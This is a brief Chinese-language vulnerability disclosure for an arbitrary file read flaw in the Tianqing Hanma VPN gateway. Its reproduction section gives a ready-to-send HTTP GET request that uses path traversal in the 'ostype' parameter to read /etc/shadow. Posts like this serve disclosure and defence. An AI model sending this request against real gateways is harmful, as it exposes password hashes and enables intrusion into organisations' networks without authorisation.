长亭百川云 - 文章详情

天清汉马vpn任意文件读取漏洞

R0seK1ller

205

2024-07-26

1. 漏洞描述

    天清汉马VPN安全网关以IPSec/SSL VPN二合一VPN安全网关为基础,提供身份认证、传输加密、访问控制、日志审计等安全功能,不仅能够为各企事业单位分支机构之间提供数据加密传输,还能够为移动办公用户提供安全、快速、易用的远程接入解决方案。攻击者可通过任意文件读取漏洞获取敏感信息。

2. 漏洞复现

GET /vpn/user/download/client?ostype=../../../../../../../etc/shadow HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36
Connection: close


![](https://mmbiz.qpic.cn/sz_mmbiz_png/yva8EEPh2zU73nevSWjMkibl2fe5j2XqCoNXc4I0d07ficu7tq4iaXDUBFPBEKHwEKOojuKyHxlHzcVtO44VedjnA/640?wx_fmt=png&from=appmsg)
相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2